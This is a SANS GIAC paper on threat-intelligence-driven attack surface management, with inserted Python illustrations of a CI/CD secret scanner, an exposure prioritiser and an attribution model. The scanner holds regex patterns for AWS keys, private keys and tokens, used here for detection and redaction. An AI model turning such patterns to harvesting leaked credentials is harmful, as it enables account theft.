
Threat Intelligence-Driven Attack Surface Management

GIAC (GCTI) Gold Certification

Author: Jonathan Matkowsky, [email protected]
Advisor: Hamed Khiabani, Ph.D.
Accepted: July 25, 2022

Abstract

Defenders struggle to keep up with the pace of digital transformation in the face of an expanding modern enterprise attack surface and more sophisticated adversaries. A conceptual framework for relating attack surface management (ASM) to vulnerability management and cyber threat intelligence (CTI) improves cyber defense. The framework explains how ASM improves cyber resiliency in proactively detecting and responding to weaknesses that adversaries could exploit to cause unacceptable harm. Defenders should prioritize ASM aligning with the business continuity and enterprise risk management functions. A CTI-driven ASM conceptual framework (CTI-ASM) helps defenders achieve decision clarity on how best to prioritize preventing the most impactful exploitations based on adversaries’ capabilities, opportunities, and intent. Security researchers have applied decision analysis methodology to solve various security challenges generally. Applying decision analysis methodology to CTI-ASM may improve the quality of its implementation and support higher quality CTI. Potentially helpful decision analysis tools and concepts include relevance diagrams, possibility and probability trees, sensitivity analysis, corporate risk attitudes, weighing imperfect information, and accounting for cognitive biases.

© 2022 The SANS Institute Author retains full rights.


1. Introduction

This commentary suggests that a cyber threat intelligence (CTI)-driven attack surface management (ASM) conceptual framework (CTI-ASM) may improve cyber resiliency against a continuously expanding modern enterprise attack surface (AS) and more sophisticated adversaries.

After discussing desirable features of CTI-ASM and possible technical tools, methods, and architectures to implement CTI-ASM, the commentary suggests that applying decision analysis methodology (DA) could improve both CTI-ASM and CTI. DA is a scientific method combining systems analysis and statistical decision theory for making rational decisions in complex, dynamic, and uncertain situations (Howard & Matheson, 1989).

Security researchers have applied DA to physical security systems (Lin et al., 2009), document trustworthiness (Bong et al., 2012), hardware security, counterfeit electronics detection, cyber system upgrades and maintenance (Collier et al., 2014), and intrusion detection architectures (Zbakh et al., 2015). They have more recently applied DA with graph analytics for cyber system resiliency (Dwivedi, 2018), rank-weight methods for multi-criteria decision analysis (Gourisetti et al., 2020), dynamic information processing (Hong, 2020), and simulations to improve risk thinking (Shreeve et al., 2021).

2. A glimpse of the enterprise attack surface

The AS is the enterprise’s weaknesses in its security procedures and internal controls that adversaries want to exploit (NIST, 2011a, p. b11).
Fig. 1. Woodall, T. (2022). Modern Day AS. JPEG File.

Adversaries target any business units or functions within the enterprise to obtain unauthorized data access or disrupt services (NIST, 2012b). The targeted AS not only includes valuable data, intangible assets, and intellectual property more generally but also machine learning (ML) and artificial intelligence (AI), which, as adversarial failures in ML and AI increase, will become more pressing (cf. Microsoft, 2020). By viewing the AS from the adversaries’ perspective [Fig. 1, supra], defenders may find the path of least resistance that adversaries will target. The path of least resistance is any initial trajectory by which adversaries start causing harm through flaws discovered externally in enterprise assets. Other external forms of vulnerability require more than passive scanning—interactive probing or exchanging communications to spot weaknesses, such as social engineering used in penetration testing.

Assets partly define the AS within the established points that an adversary can influence, access, or change to the possible detriment of the enterprise's mission, aims, and priorities (cf. Barrett, 2018, p. 14). The AS is dynamic, though. It includes anybody, any place, and anything that is either supporting operations or furthering the strategic direction that the system is interacting with or connected to; this includes embedded processors and controllers, telecommunication networks, and parts of the Internet (Stine et al., 2021, p. 18; Joint Task Force, 2018, p. 16; NIST, 2011a, pp. 1, b3; NIST, n.d.).

Much like people and the software they write, prone to errors, are targeted to get a stronger foothold into an organization, supply chain systems are also part of the AS. Protecting high-confidence bodies of training data, for instance, is a supply chain issue: engineers reuse models trained by others because training algorithms are resource-intensive (Microsoft, 2022h; Shankar et al., 2020). MITRE ATLAS case studies illustrate how adversarial ML techniques can cause considerable damage to production ML (MITRE, n.d.).

Supply chain systems may integrate several technologies running on cyber-physical infrastructures and digital system components (Yeboah-Ofori et al., 2021). It is not just high-level systems. Post-SolarWinds (CVE-2021-35244, 2021), defenders should secure the supply chain using software vulnerability assessment tools like MITRE’s Software Assurance Platform (MITRE, 2022). Also, code vulnerabilities, such as from open-source software repositories relied on by developers, are part of the AS (Microsoft, 2021c, p. 74; Wilburn & Schmidt, 2022).

Finding the confines of a system affected by vulnerabilities is challenging because it requires understanding what it means for one system to be part of another (Spring, 2022).

3. Challenges of protecting the attack surface

Defenders struggle to keep up with the pace of harmful cyber activity converging with the speed of digital transformation.

Cyber risk is already perceived ubiquitously as a top enterprise risk (Kumar, 2022). Moreover, the number of incidents is only rising in tandem with a broadening range and increasing severity of harm (Silver, 2021).

Some say that before the Covid-19 outbreak, a business suffering a security breach could permanently lose anywhere from twenty to forty percent of its customer base (PCI Pal, 2019). As a result of the Covid-19 outbreak, organizations are even more vulnerable to cyber threats (McAfee & FireEye, 2021). They rushed to move their operations online (HBR, 2021, p. 2). “With legions of employees working from home and business processes quickly digitized, corporate information technology systems and data stores suddenly grew in size and complexity, offering an expanded and enticing [AS].” (HBR, 2021, p. 2). Global digital transformation is accelerating faster than during the height of the pandemic and will likely continue for at least the next several years (IDC, 2022b).

The continued extension of enterprise boundaries and increased asset movements expand the AS. For instance, the dramatic rise in remote access services and virtual private network (VPN) usage during the Covid-19 pandemic made specific organizations more vulnerable (cf. Ginty, 2022). According to the advisories cited in ZDNet, the increased vulnerabilities stemmed from organizations that patched or updated VPNs relatively infrequently, neglected multi-factor authentication, or resorted to trying to protect insecure services behind non-standard ports that adversaries could scan (cf. Ginty, 2022).
In addition, corporate data infrastructure and applications now run across multiple clouds and hybrid environments (Badhwar, 2021, p. vii). As a result, even state-of-the-art firewalls and detection systems cannot alone safeguard corporate systems or infrastructure behind a moat; the enterprise would remain connected to the Internet (cf. Doerr, 2021). Furthermore, traditional perimeter defenses do not prevent adversaries from moving across the enterprise or steadily increasing access and control (Doherty & McKenney, 2021, p. 1).

The Internet has progressively and effectively become the new perimeter (Sargent, 2022; Rose et al., 2020, p. 1).

In addition, supply chain attacks prey on the fabric of mutual trust and dependencies supporting the economy, such as the NOBELIUM SolarWinds and HAFNIUM on-premises Exchange Server attacks (Microsoft, 2021c, pp. 1, 48, 58). Also, rapid and widespread adoption of the Internet of Things and operational technology—from smart speakers to voice-over-Internet-protocol-connected printers (cf. Hallum, 2021)—contributes to a much larger and more complicated AS. In addition, programmable systems and devices now regularly directly or indirectly interact with physical environments, including industrial controls, building management and physical access control, and environment measurement systems (NIST, n.d.).

Adversaries may now control cyber-physical systems—oil and gas pipelines, electrical power, autonomous vehicles, drones, traffic flow, transit systems, and even biological implants (cf. Microsoft, 2021c, pp. 71, 79, 82). For instance, critical security vulnerabilities in certain Chinese-made MiCODUS MV720 GPS trackers, currently used in over a hundred and fifty countries by businesses across a wide range of industries as well as by military, law enforcement, government agencies, and even a nuclear power plant operator, can easily be exploited remotely to fully control GPS, disarm vehicle alarms, change their routes, and cut off their fuel (Ahmed, 2022).

“The amount of potential attack surfaces, attack vectors, and avenues for cyber-physical attacks is practically infinite.” (Hamilton, 2021). This control is partly why ransomware payments in the United States have soared—hundreds of millions yearly (WSJ, 2022). There is potential for mass breaches of sensitive information and exploitations of critical memory allocation vulnerabilities that can crash systems across many industries and verticals. For example, Cobalt Strike, commonly used in the public and private sector as a penetration testing platform to test a firm’s resiliency, has been so widely deployed by adversaries that RiskIQ detects a command-and-control (C2) server more than hourly (Ginty, 2022). Vulnerable end-of-life, unpatched, expired services and open ports are continuously in plain sight (Ginty, 2022).

Because there is no longer a single, easily identified perimeter for the enterprise, maintaining visibility requires an intentional extension of focus to monitor the proliferation of mobile devices, Bring Your Own Device, Internet of Things, and cloud computing (Stine et al., 2020, p. 17). In addition, because most organizations embrace a multi-cloud strategy, there is a growing AS of multi-cloud deployments of container technologies—virtual machines running “containers” of microservices and their packaged dependencies and configurations (e.g., Kubernetes and Docker) (CTID, 2021a). Unsurprisingly, organizations proactively managing their AS typically find approximately thirty percent more assets than they knew they owned (Microsoft, 2022g).

And the metaverse may be the surge on the horizon. The next generation of the Internet beyond mobile and Web in an autonomous virtual shared space amplifies the existing AS. Devices that can be used as entry points threaten safety in the physical world through massive data streams and sensors collecting brain wave patterns, facial expressions, eye movements, hand movements, speech, and biometric features (Wang et al., 2022). The metaverse blurs digital and physical boundaries. As a result, protecting against Deepfake events will be more challenging, along with new challenges of compliance, privacy, identity, and trust management (Wang et al., 2022).

3.1. Sophisticated adversaries

Not only has the AS expanded and continues to expand, but we now also face sophisticated adversaries. They are not only compromising assets supporting business operations (Joint Task Force, 2018, p. 119) but explicitly targeting critical infrastructure, like crippling or holding hospitals hostage (WSJ, 2022).
Also, these days, state actors want to infiltrate vital institutions in the public sector and private sector businesses that everyday households and local communities depend on for their personal and financial wellbeing (cf. The White House, 2021).

Even non-state actors regularly deploy advanced anti-forensics and can more precisely target our weakest points (Dehghantanha et al., 2019, pp. 3, 165). They steal business model algorithms and inject payloads through mobile apps that poison deep learning models, impairing child safety (Yale & Zonghao, 2021). They also target ML models widely used for cyber defense (Beek, 2020). RiskIQ blocklists a newly detected malicious mobile app every five minutes (Microsoft, 2022f) and more than half a million new pieces of malware daily (Ginty, 2022). Threat actors change their playbooks often, use sophisticated anonymization, and commoditize sophisticated attack kits (Microsoft, 2021c, pp. 1, 8-9, 20). Some of these attacks begin and end within as little as an hour or two (Microsoft, 2021c, p. 23).

Last year alone, Microsoft observed more than ten billion malware threats, more than thirty-five billion phishing and other malicious emails, and over nine hundred brute force password theft attempts every second (Jakkal, 2022). Cybercrime will cost over ten trillion U.S. dollars annually by 2025 (Jakkal, 2022). Imagine if these costs could be avoided. It would be enough money for the U.S. government to distribute an annual stimulus check for nearly thirty thousand dollars to every person in the United States (cf. CIA, n.d.).

The Russian Federation’s attack on Ukraine and the resulting war further wrenched cyber preparedness throughout Europe and the United States. European Chief Information Security Officers (CISOs) are reassessing well-developed supply chain security guidelines and are concerned they need stronger cyber resilience due to the war. Likewise, almost half of U.S. CISOs expect to increase network protection because of the war (IDC, 2022a).

4. Attack surface management

With continuously expanding attack surfaces and more sophisticated adversaries, a “zero trust” paradigm now defines security aims (Rose et al., 2020, p. 4). This paradigm requires continually analyzing and evaluating risks to corporate identities, devices, applications, data, networks, infrastructure, and business functions under the assumption that the adversary is present in the environment (Rose et al., 2020, p. 1; Microsoft, 2021c, p. 48). After all, incomplete knowledge of deployed systems and their patch state makes organizations more vulnerable to sudden large-scale attacks (Microsoft, 2021c, p. 48).

Because of the continuously expanding AS and more sophisticated adversaries, insurance providers may expect continuous assessments and dynamic analysis to decide premiums and proper coverage (cf. Badhwar, 2021, p. 328). Also, given the challenge of protecting an enterprise from harmful cyber activity, public companies must consider the impacts of foreseeable cyber breaches, anecdotally exemplified by Bridgestone and Toyota choosing to proactively shut down parts of operations until they could better understand how cyber risk was affecting their operations (Harvard, 2022).

Gone are the days when protecting the perimeter through antivirus, firewalls, and log management sufficed. Nonetheless, many defenders struggle to integrate a myriad of solutions to adjust to this complex environment because “[t]here is often a divide between business/mission owners and security/technology management.” (Souppaya & Karen, 2022).

ASM enables an organization to achieve and maintain an acceptable level of loss exposure cost-effectively (Freund & Jones, 2014, chap. 14) by combining practices and measures to achieve organizational aims as a management system (cf. Kazmi & Naarananoja, 2014, p. 97). ASM helps protect against decentralized and independent solutions whose architectures and records are not optimally compatible with performance measurement. Performance measurement is an essential element of ASM for reporting progress and finding gaps (cf. Kazmi & Naarananoja, 2014, p. 98).

4.1. Vulnerability scanning and patch management

Enterprise vulnerability scanning and patch management (VuM) lays the foundation of ASM and supports defenders striving to proactively spot mismanaged resources before adversaries can use them for harmful cyber activity. Misconfigurations are often a root cause of compromised systems (Diogenes & Shinder, 2018, Ch. 1). “Indeed, Gartner predicts that by 2025, more than 85% of successful attacks against enterprise users will exploit configuration and user errors in legacy systems.” (Gartner, 2021a, p. 4).

4.2. Business continuity and enterprise risk management

Defenders may gather insights from the business continuity management (BCM) function on how and what to prioritize protecting, especially for evaluating and considering the probable frequency and size of acceptable future losses (Freund & Jones, 2014; ISO, 2020, p. 2). For example, BCM may help to define the types of and the extent to which disruption is tolerable across a range of possible negative consequences for the organization: reputational damage, operational harm, contractual damages, monetary loss, legal repercussions, regulatory fines, and failure to deliver on business goals or lost business opportunities (ISO, 2020, pp. 4, 22).

In addition, ASM may gain insights from the enterprise risk management (ERM) function within the organization (Joint Task Force, 2018, p. iv; Stine et al., 2020, p. 4). Evaluating the criticality and sensitivity of enterprise assets shapes the proper risk tolerance (Stine et al., 2021, p. 18). Coordinating with ERM would help ensure risk alignment of resources with the organizational mission and vision and may help ERM protect shareholder value (COSO, 2017, pp. 2, 5).

Coordinating with ERM is also important because cyber risks interlock with various other types of enterprise risks (cf. NIST, 2016c). “[Such] incidents can have operational, financial, reputational, and strategic consequences for the organization — and these incidents are growing in number and cost.” (Gartner, 2021b, p. 1).

To fortify business goals and aims, ASM relies on senior leadership to define mission priorities, proper capital and operating expenses, and adequate risk appetite and tolerance (Stine et al., 2021, pp. 11, 15). In addition, turning to senior leadership is the only way to decide how to protect business assets based on their value to the business and the expected risk (Open Group, 2021).
4.3. Continuous visibility

Whether continuous visibility comes from a mature VuM program as part of ASM or from ASM software and managed services, ASM requires constant visibility into all the enterprise endpoints and assets. ASM focuses on managing adversaries' uncertain potential negative impact, understanding how adversaries exploit vulnerabilities, and neutralizing the exploitations by reducing the AS (Smith, 2022).

Assets include embedded devices and servers, cloud services, source code, pre-deployed code, software platforms, virtual machines, applications, and their dependencies and sources, components, operating systems, firmware, and which software and versions those assets run, down to the level of packages and libraries (Souppaya & Karen, 2022; Diamond et al., 2022).

For instance, ASM should supply continuous visibility of cloud assets across a multi-cloud environment to spot any misconfigurations or vulnerable components and understand how a potential adversary may try to exploit them (Estrin, 2022). After all, adversaries weaponize cloud resources to harm other target systems because of poor security hygiene, such as sharing public key secrets in a public cloud. For instance, bots will scan for keys leaked into log files on Continuous Integration and Continuous Delivery (CI/CD) services used for automation in building, testing, and deployment of applications, and in Git repositories such as GitHub, to steal these keys (Diogenes & Shinder, 2018, Ch. 1).
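The leaked-key problem described above is one that defenders can check for on their own side of the pipeline. As an added illustration, not code from the paper or from any product it cites, the following Python scanner runs over constructed CI/CD log lines, flags values that match credential patterns, and redacts them before the log is retained or shared. The "AKIA" prefix of AWS access key IDs is the only real-world pattern used; the other rules, the entropy threshold, and the sample log lines are assumptions made for this example.

```python
"""Constructed example (not from the paper): detect and redact credentials
leaked into CI/CD log lines before the logs are retained or shared.

Assumptions: the rule set is illustrative. "AKIA" is the well-known prefix of
AWS access key IDs; the other patterns and the entropy threshold are chosen
for this example and would be tuned per environment."""
import math
import re
from collections import Counter

# Illustrative rules. group(1) holds the value for the assignment rule,
# group(0) for the others.
KEY_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "generic_assignment": re.compile(
        r"(?i)\b(?:api[_-]?key|secret|token|password)\b\s*[=:]\s*['\"]?"
        r"([A-Za-z0-9+/_\-]{20,})"
    ),
}
ENTROPY_THRESHOLD = 4.0  # bits per character; an assumption for this example


def shannon_entropy(s):
    """Bits of entropy per character; random tokens score high, words low."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def find_secrets(line):
    """Return [(rule_name, matched_value)] for one log line."""
    hits = []
    for name, pattern in KEY_PATTERNS.items():
        for m in pattern.finditer(line):
            value = m.group(1) if m.groups() else m.group(0)
            # For loose key=value matches, only flag values that look random,
            # so a version string assigned to "token" is not a false positive.
            if name == "generic_assignment" and shannon_entropy(value) < ENTROPY_THRESHOLD:
                continue
            hits.append((name, value))
    return hits


def redact(line, hits):
    for _, value in hits:
        line = line.replace(value, "[REDACTED]")
    return line


def scan_log(lines):
    """Scan log lines; return (findings, redacted_lines).

    Findings keep only a short prefix of the value so the report itself
    does not become a second copy of the secret."""
    findings, redacted = [], []
    for number, line in enumerate(lines, 1):
        hits = find_secrets(line)
        for rule, value in hits:
            findings.append({"line": number, "rule": rule, "prefix": value[:4] + "..."})
        redacted.append(redact(line, hits))
    return findings, redacted


# Constructed CI/CD log lines; the key values are fake.
SAMPLE_LOG = [
    "2022-07-25T10:01:02Z [build] Restoring packages from cache",
    "2022-07-25T10:01:05Z [deploy] env AWS_ACCESS_KEY_ID=AKIAEXAMPLE012345678 loaded",
    "2022-07-25T10:01:06Z [deploy] token = 'staging_staging_staging_build'",
    "2022-07-25T10:01:07Z [deploy] api_key: q8Zr2kL0pX9vT4nB7yH3wE6cJ1mD5sA",
    "2022-07-25T10:01:09Z [test] 128 passed, 0 failed",
]

if __name__ == "__main__":
    found, clean = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line']}: {f['rule']} ({f['prefix']})")
    print("\n".join(clean))
```

The entropy gate is what keeps the loose key/value rule usable: the low-entropy "token" assignment on line 3 is skipped, while the random-looking value on line 4 is reported and redacted. In a pipeline this check sits before log retention and before any step that publishes build output.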


ASM includes the “activities, technology and managed services deployed to discover internet-facing enterprise assets and systems and associated vulnerabilities” that adversaries would want to exploit (Shoard & Handa, 2021, p. 10)—even before any intrusion, during the reconnaissance stage (Hutchins et al., 2011). Otherwise, adversaries may be trying to maintain persistence or act on their objectives by the time they are detected. ASM organizes information enabling decisions on how to address the threats of adversaries’ uncertain potential adverse impact and improve continuously (Barrett, 2018, p. 6).

For example, defenders may prefer integrating relevant detection queries based on ASM priorities into an extended detection and response (XDR) solution with security orchestration, automation, and response (SOAR) capabilities (Microsoft, 2020). This integration would use automation and ML or hunter-trained AI to collect, correlate, and analyze relevant data across the enterprise environment—including endpoints, email traffic, applications, virtual machines, and identities.

After all, to meet the increased demands for digital interfaces and services and support a hybrid work environment, ASM must use expert-assisted AI, ML, and automation to effectively manage security risks at scale (HBR, 2021, pp. 4, 8). For instance, ASM may automatically surface and apply mitigation to vulnerable devices, software, files, and container images running in the cloud that use an affected Log4j component (Microsoft, 2021f).

Defenders should also be able to discover attack surfaces in website paths and covert vulnerabilities in payloads with ASM (cf. Yan et al., 2022). In addition, ASM software should be able to consolidate AS vectors from multiple scanners to detect cross-site scripting vulnerabilities and other security issues in Java web applications and PHP web application vulnerabilities (Yan et al., 2022).

With ASM, defenders identify a broad range of technical vulnerabilities used to gain initial access and non-technical vulnerabilities, such as exposed personal or access information in open-source data (Roy et al., 2022). ASM then helps contextualize how specific vulnerabilities from across the host, application, and network layers, when sequentially combined, become more effective for the adversary (Roy et al., 2022; Spring et al., 2021).

ASM should illuminate what the adversary would target during the reconnaissance stage (Hutchins et al., 2011) when trying to infiltrate the organization (Shoard & Handa, 2021, p. 4). This ASM feature is sometimes called “External ASM” (Microsoft, 2021e). External ASM can detect vulnerabilities that the adversary would want to use to gain an initial foothold and drop remote access toolkits, activate hands-on-keyboard attacks, exfiltrate data, and deploy ransomware through libraries on devices, software files, and components (cf. Microsoft, 2022d).

5. Threat intelligence-driven attack surface management

ASM alone does not measure whether adversaries commonly exploit an exposure or whether a vulnerability is well-known. In addition, it does not explain the degree of control or the benefit that the adversary would stand to gain, how easy it would be to get started, the specific impacts on human safety, if applicable, or the company’s mission (Spring, 2022).
Even after fine-tuning ASM based on BCM and ERM inputs, it appears from computational modeling applicable to modern systems that programmers cannot produce “a pragmatically useful piece of software…without vulnerabilities,” which are “countably infinite.” (Spring, 2022, pp. 11-12). Therefore, the technical details of specific vulnerabilities are not as helpful without understanding which vulnerabilities are likely to be used at any exact time and in a particular organization (Spring, 2022, p. 17). CTI-ASM helps contextualize how to prevent vulnerabilities from being exploited beyond the technical severity offered through the Common Vulnerability Scoring System (CVSS).

Also, teams cannot focus on all threats, or they will get burned out (Godyla & Nickels, 2021). With CTI-ASM, defenders can use CTI assessments to prioritize vulnerabilities based on understanding the adversaries' capabilities, opportunities, and intent in conducting their harmful cyber activity (cf. Brown & Lee, 2021).
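To make the "beyond CVSS" point concrete, the following Python block is an added worked example, not the paper's method and not any cited vendor's scoring scheme. Each exposure carries its CVSS base score together with CTI signals for adversary capability, opportunity, and intent and a BCM/ERM asset criticality rating; a weighting constructed for this illustration combines them, and the resulting order is compared with a CVSS-only order. The finding identifiers, assets, weights, and signal values are all assumptions.

```python
"""Constructed example (not the paper's or any vendor's scoring method):
rank exposures using CVSS together with CTI context (adversary capability,
opportunity, intent) and BCM/ERM asset criticality.

The weights, the findings and their identifiers are assumptions made for
this illustration, not a published standard."""
from dataclasses import dataclass


@dataclass
class Exposure:
    finding_id: str          # constructed placeholder, not a real advisory ID
    asset: str
    cvss: float              # technical severity, 0-10
    internet_facing: bool    # opportunity: reachable during reconnaissance
    asset_criticality: int   # BCM/ERM input, 1 (low) to 5 (mission-critical)
    exploit_public: bool     # capability: a working exploit is available
    exploited_in_wild: bool  # capability and intent: seen in real intrusions
    sector_targeted: bool    # intent: actors targeting our sector use it


def capability(e):
    """How able adversaries are to use this weakness right now."""
    if e.exploited_in_wild:
        return 1.0
    if e.exploit_public:
        return 0.7
    return 0.3


def opportunity(e):
    """Whether the adversary can reach the weakness from outside."""
    return 1.0 if e.internet_facing else 0.4


def intent(e):
    """Whether the actors that target our sector are known to use it."""
    return 1.0 if e.sector_targeted else 0.5


def priority(e):
    """Scale CVSS by threat (capability x opportunity x intent) and by
    business impact. The result stays in the 0-10 range of CVSS so it can
    be read next to the raw score it refines."""
    threat = capability(e) * opportunity(e) * intent(e)
    impact = e.asset_criticality / 5
    return round(e.cvss * (0.4 + 0.6 * threat) * (0.5 + 0.5 * impact), 2)


def rank(exposures):
    """Highest CTI-ASM priority first."""
    return sorted(exposures, key=priority, reverse=True)


def rank_by_cvss(exposures):
    """Baseline for comparison: technical severity alone."""
    return sorted(exposures, key=lambda e: e.cvss, reverse=True)


# Constructed findings for three assets.
SAMPLE_EXPOSURES = [
    Exposure("F-1", "internal test VM", 9.8, False, 1, False, False, False),
    Exposure("F-2", "customer VPN gateway", 7.5, True, 5, True, True, True),
    Exposure("F-3", "marketing web server", 8.8, True, 3, True, False, False),
]

if __name__ == "__main__":
    print("CVSS only :", [e.finding_id for e in rank_by_cvss(SAMPLE_EXPOSURES)])
    print("CTI-ASM   :", [(e.finding_id, priority(e)) for e in rank(SAMPLE_EXPOSURES)])
```

The CVSS-only order puts the 9.8 on the internal test VM first; the CTI-driven order puts the 7.5 on the internet-facing, mission-critical VPN gateway first because it is exploited in the wild by actors targeting the sector. The weights are the part a team would calibrate, which is exactly where the decision analysis tools named in the abstract (sensitivity analysis, risk attitudes) apply.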
CTI aids defenders in understanding the chronology of harmful cyber operations in the context of monitoring across endpoints, identities, and applications—both in the public and private cloud and hybrid (cf. Microsoft, 2021b). This way, defenders can not only detect and block malicious components of a single operation but also of a campaign and follow-on campaigns (cf. Microsoft, 2021b).

CTI-ASM also reflects a conscientious effort to reduce methodical and perceptive biases in making judgments and analyzing evidence (cf. Heuer, 2019, pp. 111-72). Accordingly, it includes an “audit trail” of interpretations (Heuer, 2019, p. 109), presents assumptions and sequences of extrapolations, shows the level and basis of hesitation, and reveals and explains other viewpoints (Heuer, 2019, p. 16).

Similarly, Charles T. Munger, Warren Buffett’s partner in running Berkshire Hathaway, noted that Darwin’s impact on science was due in considerable measure to prioritizing any evidence tending to undermine whatever cherished and hard-won theory he already had (Davis, 2009). According to Mr. Munger, Einstein also partially attributed his successful views to self-criticism, which Mr. Munger explained means testing and destroying his well-loved ideas (Davis, 2009). CTI-ASM (including embedded AI and ML) should similarly be self-critical, continuously striving to find evidence to confirm the weaknesses in any of its insights or convictions.

Process-wise, CTI production starts with collecting and evaluating cyber threat information in its source and reliability through rigorous and structured tradecraft techniques using all-source knowledge and substantive experience (Security Intel, n.d.). It is an “intelligence-driven” method to detect rapidly, respond to, and recover from threat events aimed at safeguarding assets (Stine et al., 2021, p. 26). CTI-ASM collects information on threats and threat actors from various technical and human means (Kriaa & Chaabane, 2021, p. 113) and expresses this comprehension in a structured way using proper analysis techniques (Schaberreiter et al., 2019).

CTI-ASM is cyclical. Data collection is planned, implemented, and evaluated using systematized analytic skills. It distributes and reevaluates the resulting intelligence based on feedback from a wide range of data collection sources, such as Kusto Query Language (KQL) queries (Microsoft, 2022c) for unusual processes that may have launched on a protected endpoint, and more current knowledge. Finally, CTI-ASM restructures the collection and fills intelligence gaps (cf. Security Intel, n.d.). Human experts assist AI and ML in CTI-ASM to promptly inform decision-makers, based on the evidence, about proactive and reactive cyber defensive measures (cf. CIS, 2021a).

CTI-ASM derives actionable insights into how adversaries plan, conduct, and sustain their operations. It engages in direct attribution or profiling the type of threat actor using a robust and reliable set of considerations. CTI-ASM decides the malicious activity’s scope, origin, and direction, assesses a timestamp, and evaluates the adversarial goals, aims, and TTPs (tactics, techniques, and procedures) (Mavroeidis et al., 2021, p. 328).

CTI-ASM streamlines the collection and processing through automation that frees up analyst time needed to use CTI for awareness of the AS (cf. Brown & Lee, 2019, p. 15). For instance, last year, local governments found they could cut down the time needed to take defensive measures from days to a few minutes by taking part in a pilot project testing an automated data feed of potential network compromises (CIS, 2021a). This speed tends to be critical when dealing with hybrid attacks across multiple domains. For instance, blocking an adversary in the cloud from running malicious code on an endpoint will not stop the attacker from doing it again if they have already gained persistence in the cloud. However, automation tools, fusing actionable intelligence across domain boundaries, remediating all affected assets, and improving the security configurations prevent a recurrence (Microsoft, 2022a).

Applying ML techniques and algorithms to CTI properties can improve the accuracy of threat prediction analysis and hypothesis generation (Elitzur et al., 2019, p. 47). Such an application also helps find foreseeable threats to the supply chain (e.g., ransomware and spear-phishing) and helps to apply reasonable controls (Yeboah-Ofori et al., 2021). In addition, ML and data mining have been applied successfully to analyze malware and to detect network anomalies, including anomalous Border Gateway Protocol behavior (Dehghantanha et al., 2019, pp. 3, 67). Similarly, Microsoft uses statistical methods to track threat actors and TTPs (Microsoft, 2021a).
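The statistical tracking of actors by their TTPs mentioned in the paragraph above reduces, in its simplest form, to a Bayesian calculation. What follows is an added example, not Microsoft's method or code: three hypothetical actor profiles (how often each ATT&CK technique appeared in their past intrusions), constructed base rates, and a constructed incident are scored with a Bernoulli naive Bayes model. The technique IDs are real ATT&CK identifiers; every frequency, base rate and actor name is made up for the illustration.

```python
"""Bernoulli naive-Bayes scoring of an intrusion's ATT&CK techniques against actor profiles.

Added illustration of the statistical actor-tracking idea discussed above; it is not
Microsoft's implementation. Actor names, technique frequencies, base rates and the
observed incident are all constructed for this example.
"""
import math

# Constructed profiles: for each hypothetical actor, the fraction of past intrusions
# (from a CTI knowledge base) in which the ATT&CK technique was observed.
ACTOR_PROFILES = {
    "ACTOR-A": {"T1566": 0.9, "T1059": 0.8, "T1078": 0.3, "T1021": 0.6, "T1486": 0.9},
    "ACTOR-B": {"T1190": 0.8, "T1059": 0.6, "T1078": 0.7, "T1021": 0.5, "T1486": 0.1},
    "ACTOR-C": {"T1566": 0.6, "T1059": 0.5, "T1078": 0.2, "T1021": 0.2, "T1486": 0.05},
}
PRIORS = {"ACTOR-A": 0.4, "ACTOR-B": 0.3, "ACTOR-C": 0.3}  # constructed base rates
ALL_TECHNIQUES = sorted({t for profile in ACTOR_PROFILES.values() for t in profile})
FLOOR = 0.02  # never use 0 or 1: one unexpected technique must not veto an actor outright


def log_likelihood(profile, observed):
    """log P(observed technique set | actor), treating each technique as independent."""
    total = 0.0
    for tech in ALL_TECHNIQUES:
        p = min(max(profile.get(tech, FLOOR), FLOOR), 1 - FLOOR)
        total += math.log(p if tech in observed else 1 - p)
    return total


def attribute(observed):
    """Posterior probability per actor, highest first, from priors and likelihoods."""
    log_posts = {actor: math.log(PRIORS[actor]) + log_likelihood(ACTOR_PROFILES[actor], observed)
                 for actor in ACTOR_PROFILES}
    shift = max(log_posts.values())  # log-sum-exp keeps the exponentials in range
    weights = {actor: math.exp(v - shift) for actor, v in log_posts.items()}
    norm = sum(weights.values())
    return sorted(((actor, w / norm) for actor, w in weights.items()), key=lambda x: -x[1])


def confident_call(observed, threshold=0.8):
    """Name an actor only when the posterior is decisive; otherwise return None."""
    actor, prob = attribute(observed)[0]
    return actor if prob >= threshold else None


if __name__ == "__main__":
    incident = {"T1566", "T1059", "T1021", "T1486"}  # constructed observations
    for actor, prob in attribute(incident):
        print(f"{actor}: {prob:.3f}")
    print("call:", confident_call(incident))
```

The floor keeps a single unexpected technique from eliminating an actor, and confident_call refuses to name anyone below a posterior threshold, which is the restraint a CTI team wants before an attribution leaves the building. With the constructed numbers, an incident showing phishing, scripting, remote services and encryption for impact is attributed decisively, while scripting plus valid accounts alone splits between two actors and yields no call.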
Therefore, CTI-ASM includes the application of AI and ML to recognize, absorb, and act wisely against more advanced forms of harmful cyber activity (Dehghantanha et al., 2019, p. 3). ML derives risk scenarios from potential threats to, and vulnerabilities in, the crucial assets contributing to the AS. CTI-ASM then assesses the derived risk scenarios by the impact and frequency of their effects (Stine et al., 2021, pp. 32-33).
CTI sources include commercial subscriptions, automated data feeds, sector-specific sharing of indicators of compromise and alerts, industry-specific threat models, and knowledge bases of observed adversary tactics and techniques (Stine et al., 2021, p. 26).
CTI formats in CTI-ASM include frameworks, standards, scoring systems, and enumerations. For example, MITRE ATT&CK (MITRE, n.d.) supplies an overview of specific threat characteristics. STIX 2.1 (Structured Threat Information Expression), including its Course of Action (CoA) objects, is a standard for describing threats, attacks, and the facets of security incidents. CVSS supplies metrics for assessing the severity of vulnerabilities, and the Common Weakness Enumeration (CWE) supplies enumerations and unique identifiers for types of weakness (Schlette et al., 2021, pp. 2527-28).

Using the open-source ATT&CK Workbench, an organization may manage and extend its local version of ATT&CK and keep it synchronized with MITRE's knowledge base, aligning CTI-ASM with that knowledge base (cf. CTID, 2021b).

